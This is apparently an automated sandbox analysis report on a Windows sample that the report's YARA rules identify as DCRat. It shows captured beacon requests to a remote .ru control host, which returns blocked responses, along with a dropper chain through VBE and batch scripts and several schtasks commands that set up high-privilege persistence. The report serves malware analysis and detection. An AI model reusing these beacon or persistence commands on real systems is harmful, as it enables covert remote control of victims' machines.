                                  Sep 27, 2024 08:43:36.033229113 CEST1236INData Raw: 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 33 38 25 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 6f 70 61 63 69 74 79 3a 2e 34 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 5f 5f 72 69 67
                                  Data Ascii: t-weight:700;line-height:138%;color:#000;opacity:.4}.wrapper .content .footer__rights .year{font-weight:700}@media screen and (max-width:1105px){.wrapper .content{padding-left:77px}.wrapper .content .right-side{top:unset;bottom:52px;position:a
                                  Sep 27, 2024 08:43:36.033241034 CEST1236INData Raw: 20 3c 70 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 6e 61 6d 65 22 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 3c 62 3e 34 30 33 30 3c 2f 62 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20
                                  Data Ascii: <p class="error-block__name"> <b>4030</b></p> <p class="error-block__en">Error 4030. <b> Website is blocked.Please try again later.</b></p> <h1 c
                                  Sep 27, 2024 08:43:36.033252001 CEST1236INData Raw: 31 39 39 20 37 34 2e 36 30 32 20 31 38 39 2e 39 38 20 37 33 2e 30 37 34 33 43 31 39 33 2e 38 30 36 20 37 31 2e 39 32 38 36 20 31 39 37 2e 30 35 37 20 36 39 2e 30 36 34 34 20 31 39 38 2e 30 31 34 20 36 35 2e 32 34 35 34 43 31 39 38 2e 35 38 37 20
                                  Data Ascii: 199 74.602 189.98 73.0743C193.806 71.9286 197.057 69.0644 198.014 65.2454C198.587 63.9087 196.675 63.5268 196.292 64.6725Z" fill="black"/> <path d="M172.767 100.762C171.428 100.189 169.898 99.9985 168.559 99.9985C167.602 98.2799 168.55
                                  Sep 27, 2024 08:43:36.033263922 CEST1236INData Raw: 34 2e 31 33 31 20 31 30 36 2e 31 30 38 20 31 33 34 2e 35 31 34 20 31 30 35 2e 37 32 36 43 31 33 37 2e 33 38 33 20 31 30 33 2e 34 33 35 20 31 34 30 2e 30 36 20 31 30 30 2e 39 35 32 20 31 34 32 2e 35 34 37 20 39 38 2e 34 36 39 38 43 31 34 33 2e 35
                                  Data Ascii: 4.131 106.108 134.514 105.726C137.383 103.435 140.06 100.952 142.547 98.4698C143.503 97.515 142.164 96.1784 141.208 97.1331Z" fill="black"/> <path d="M139.104 92.3605L128.393 95.6066C127.245 95.9885 127.628 97.7071 128.967 97.5161C132.
                                  Sep 27, 2024 08:43:36.033274889 CEST1236INData Raw: 33 43 32 39 38 2e 36 31 39 20 31 30 36 2e 33 20 32 39 36 2e 38 39 38 20 31 30 36 2e 38 37 33 20 32 39 36 2e 33 32 34 20 31 30 37 2e 32 35 35 43 32 39 35 2e 39 34 31 20 31 30 36 2e 38 37 33 20 32 39 34 2e 37 39 34 20 31 30 36 2e 31 31 20 32 39 34
                                  Data Ascii: 3C298.619 106.3 296.898 106.873 296.324 107.255C295.941 106.873 294.794 106.11 294.411 106.11C295.176 104.391 296.324 102.291 294.985 100.572C294.602 99.9991 294.029 99.9991 293.455 100.381C290.395 103.436 287.143 106.491 284.083 109.547C283.8
                                  Sep 27, 2024 08:43:36.033288002 CEST1236INData Raw: 33 20 34 39 2e 32 30 36 34 20 31 31 37 2e 31 30 38 20 34 38 2e 34 34 32 36 20 31 31 36 2e 39 31 37 20 34 38 2e 34 34 32 36 43 31 30 31 2e 32 33 33 20 34 35 2e 37 36 39 32 20 38 36 2e 38 38 38 35 20 34 38 2e 34 34 32 36 20 37 31 2e 33 39 36 31 20
                                  Data Ascii: 3 49.2064 117.108 48.4426 116.917 48.4426C101.233 45.7692 86.8885 48.4426 71.3961 51.3068C66.997 52.0706 62.4066 53.0254 58.0075 53.9801C57.2424 54.1711 57.0512 55.1258 57.625 55.5077C63.3629 61.4272 69.1009 67.3466 75.0301 73.2661C80.1943 78.
                                  Sep 27, 2024 08:43:36.033299923 CEST1236INData Raw: 31 31 37 20 31 32 30 2e 38 31 33 20 31 36 2e 36 39 34 32 20 31 32 31 2e 35 37 37 20 31 37 2e 30 37 36 38 20 31 32 32 2e 33 34 43 31 37 2e 34 35 39 33 20 31 32 33 2e 31 30 34 20 31 38 2e 30 33 33 31 20 31 32 33 2e 38 36 38 20 31 38 2e 36 30 36 39
                                  Data Ascii: 117 120.813 16.6942 121.577 17.0768 122.34C17.4593 123.104 18.0331 123.868 18.6069 124.823C17.268 124.632 15.9292 124.823 14.7816 125.014C14.0165 125.205 13.4427 125.396 12.6777 125.586C12.1039 125.777 11.3388 126.159 10.9563 126.732C10.5738 1
                                  Sep 27, 2024 08:43:36.182079077 CEST576OUTGET /d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtrz6R2UADF6n&EZw5=aFR3YoMuimzGc HTTP/1.1
                                  Accept: */*
                                  Content-Type: text/csv
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                  Host: a1025223.xsph.ru
                                  Sep 27, 2024 08:43:36.391685009 CEST1236INHTTP/1.1 403 Forbidden
                                  Server: openresty
                                  Date: Fri, 27 Sep 2024 06:43:36 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Vary: Accept-Encoding
                                  Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                                  Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.949720141.8.194.149803592C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 27, 2024 08:43:53.153426886 CEST596OUTGET /d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme HTTP/1.1
                                  Accept: */*
                                  Content-Type: application/json
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                  Host: a1025223.xsph.ru
                                  Connection: Keep-Alive
                                  Sep 27, 2024 08:43:53.823070049 CEST1236INHTTP/1.1 403 Forbidden
                                  Server: openresty
                                  Date: Fri, 27 Sep 2024 06:43:53 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Vary: Accept-Encoding
                                  Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                                  Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
                                  Sep 27, 2024 08:43:53.823097944 CEST224INData Raw: 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b
                                  Data Ascii: tify;justify-content:space-between;position:relative}.wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inlin
                                  Sep 27, 2024 08:43:53.823116064 CEST1236INData Raw: 65 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 69 6e 6c 69 6e 65 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 76 65 72 74 69 63 61 6c 3b 2d
                                  Data Ascii: e-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-webkit-flex-direction:column;-moz-box-orient:vertical;-moz-box-direction:normal;-ms-flex-direction:column;flex-direction:column}.wra
                                  Sep 27, 2024 08:43:53.823132992 CEST1236INData Raw: 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 72
                                  Data Ascii: webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex}.wrapper .content .right-side .image-container{width:100%;height:100%;max-width:328px;max-height:384px;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-m
                                  Sep 27, 2024 08:43:53.823148012 CEST448INData Raw: 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 33 38 25 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 6f 70 61 63 69 74 79 3a 2e 34 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 5f 5f 72 69 67
                                  Data Ascii: t-weight:700;line-height:138%;color:#000;opacity:.4}.wrapper .content .footer__rights .year{font-weight:700}@media screen and (max-width:1105px){.wrapper .content{padding-left:77px}.wrapper .content .right-side{top:unset;bottom:52px;position:a
                                  Sep 27, 2024 08:43:53.823162079 CEST1236INData Raw: 65 72 2d 78 73 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 72 69 67 68 74 2d 73 69 64 65 20 2e 69 6d 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 6d 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65
                                  Data Ascii: er-xs{display:block}.wrapper .content .right-side .image-container-md{display:none}.wrapper .content .footer{max-width:328px}.wrapper .content .footer--long{max-width:333px}.wrapper .content .footer__rights{max-width:230px}}@media screen and (
                                  Sep 27, 2024 08:43:53.823178053 CEST1236INData Raw: 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 69 67 68 74 2d 73 69 64 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 61 67 65 2d 63 6f 6e 74
                                  Data Ascii: </div> <div class="right-side"> <div class="image-container image-container-md"> <a href="https://index.from.sh/pages/game.html"> <svg width="328" height="384" viewbox="0
                                  Sep 27, 2024 08:43:53.823200941 CEST1236INData Raw: 37 2e 30 31 33 39 43 31 36 38 2e 37 35 20 38 37 2e 35 38 36 37 20 31 36 38 2e 35 35 39 20 38 38 2e 37 33 32 34 20 31 36 37 2e 37 39 34 20 38 39 2e 34 39 36 32 43 31 36 37 2e 34 31 31 20 39 30 2e 30 36 39 31 20 31 36 36 2e 36 34 36 20 38 39 2e 38
                                  Data Ascii: 7.0139C168.75 87.5867 168.559 88.7324 167.794 89.4962C167.411 90.0691 166.646 89.8781 166.072 89.6872C165.116 88.7324 163.968 87.7777 163.012 86.632C162.247 85.8682 161.099 85.1044 160.143 85.2953C159.761 85.2953 159.378 85.2953 158.995 85.486
                                  Sep 27, 2024 08:43:53.823216915 CEST672INData Raw: 31 38 35 2e 30 30 38 20 38 39 2e 34 39 35 34 20 31 38 36 2e 31 35 35 20 38 39 2e 34 39 35 34 43 31 38 39 2e 37 38 39 20 38 39 2e 33 30 34 35 20 31 39 33 2e 34 32 33 20 38 39 2e 34 39 35 34 20 31 39 36 2e 38 36 36 20 38 39 2e 38 37 37 33 43 31 39
                                  Data Ascii: 185.008 89.4954 186.155 89.4954C189.789 89.3045 193.423 89.4954 196.866 89.8773C197.44 89.8773 197.822 89.4954 197.822 88.9226C197.822 88.3497 197.44 87.9678 196.866 87.9678Z" fill="black"/> <path d="M199.352 96.3699C195.718 94.8423 19
                                  Sep 27, 2024 08:43:53.823234081 CEST1236INData Raw: 33 30 38 2e 31 38 32 20 31 30 37 2e 34 34 36 20 33 30 39 2e 35 32 31 20 31 30 35 2e 37 32 38 43 33 30 39 2e 39 30 34 20 31 30 35 2e 31 35 35 20 33 30 39 2e 33 33 20 31 30 34 2e 32 20 33 30 38 2e 37 35 36 20 31 30 34 2e 32 43 33 30 35 2e 33 31 33
                                  Data Ascii: 308.182 107.446 309.521 105.728C309.904 105.155 309.33 104.2 308.756 104.2C305.313 104.2 301.87 104.964 298.619 106.3C298.619 106.3 296.898 106.873 296.324 107.255C295.941 106.873 294.794 106.11 294.411 106.11C295.176 104.391 296.324 102.291 2
                                  Sep 27, 2024 08:43:53.828172922 CEST1236INData Raw: 20 31 33 32 2e 39 38 33 20 34 31 2e 39 35 30 32 43 31 33 30 2e 36 38 38 20 34 33 2e 32 38 36 39 20 31 32 38 2e 32 30 32 20 34 34 2e 36 32 33 35 20 31 32 35 2e 37 31 35 20 34 35 2e 39 36 30 32 43 31 32 33 2e 34 32 20 34 37 2e 32 39 36 39 20 31 32
                                  Data Ascii: 132.983 41.9502C130.688 43.2869 128.202 44.6235 125.715 45.9602C123.42 47.2969 121.316 48.6335 118.83 49.2064C118.83 49.2064 117.108 48.4426 116.917 48.4426C101.233 45.7692 86.8885 48.4426 71.3961 51.3068C66.997 52.0706 62.4066 53.0254 58.007
                                  Sep 27, 2024 08:43:54.156132936 CEST572OUTGET /d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme&2132410dd3c9d0ed40475469f1dad04b=a4985c72318361485c5567463b9f03e9&5f975759356989d1a1cbaf57a59bcab1=AMiJGN0MDN0cjYwMGNmV2Y3UWOzADMiFjMkBTY0MTOllDOzETYyMGO&jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM3C276sojEJ5=FCtpJNQfNme HTTP/1.1
                                  Accept: */*
                                  Content-Type: application/json
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                  Host: a1025223.xsph.ru
                                  Sep 27, 2024 08:43:54.365571022 CEST1236INHTTP/1.1 403 Forbidden
                                  Server: openresty
                                  Date: Fri, 27 Sep 2024 06:43:54 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Vary: Accept-Encoding
                                  Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d [TRUNCATED]
                                  Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:02:42:02
                                  Start date:27/09/2024
                                  Path:C:\Users\user\Desktop\adKGhCOOzg.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\adKGhCOOzg.exe"
                                  Imagebase:0x340000
                                  File size:3'099'403 bytes
                                  MD5 hash:3B5AE0315B4623A6BD2C711BC8B8E28F
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:2
                                  Start time:02:42:02
                                  Start date:27/09/2024
                                  Path:C:\Windows\SysWOW64\wscript.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\portcontainerRef\myQbMgAKm.vbe"
                                  Imagebase:0x9c0000
                                  File size:147'456 bytes
                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:3
                                  Start time:02:42:11
                                  Start date:27/09/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\portcontainerRef\J34SCTDenq2CEriZjkOuf.bat" "
                                  Imagebase:0xc50000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:4
                                  Start time:02:42:11
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff70f010000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:5
                                  Start time:02:42:11
                                  Start date:27/09/2024
                                  Path:C:\portcontainerRef\SurrogateContainerAgent.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\portcontainerRef\SurrogateContainerAgent.exe"
                                  Imagebase:0xec0000
                                  File size:2'782'208 bytes
                                  MD5 hash:7AF97370DBD8A244A113783A7021E677
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1476955180.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1476955180.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1480370070.000000001344D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 88%, ReversingLabs
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:10
                                  Start time:02:42:13
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\schtasks.exe
                                  Wow64 process (32bit):false
                                  Commandline:schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 14 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /f
                                  Imagebase:0x7ff610800000
                                  File size:235'008 bytes
                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:11
                                  Start time:02:42:14
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\schtasks.exe
                                  Wow64 process (32bit):false
                                  Commandline:schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmE" /sc ONLOGON /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f
                                  Imagebase:0x7ff610800000
                                  File size:235'008 bytes
                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:12
                                  Start time:02:42:14
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\schtasks.exe
                                  Wow64 process (32bit):false
                                  Commandline:schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 11 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f
                                  Imagebase:0x7ff610800000
                                  File size:235'008 bytes
                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:13
                                  Start time:02:42:14
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\schtasks.exe
                                  Wow64 process (32bit):false
                                  Commandline:schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 7 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /f
                                  Imagebase:0x7ff610800000
                                  File size:235'008 bytes
                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:14
                                  Start time:02:42:14
                                  Start date:27/09/2024
                                  Path:C:\Windows\System32\schtasks.exe
                                  Wow64 process (32bit):false
                                  Commandline:schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmE" /sc ONLOGON /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /rl HIGHEST /f
                                  Imagebase:0x7ff610800000
                                  File size:235'008 bytes
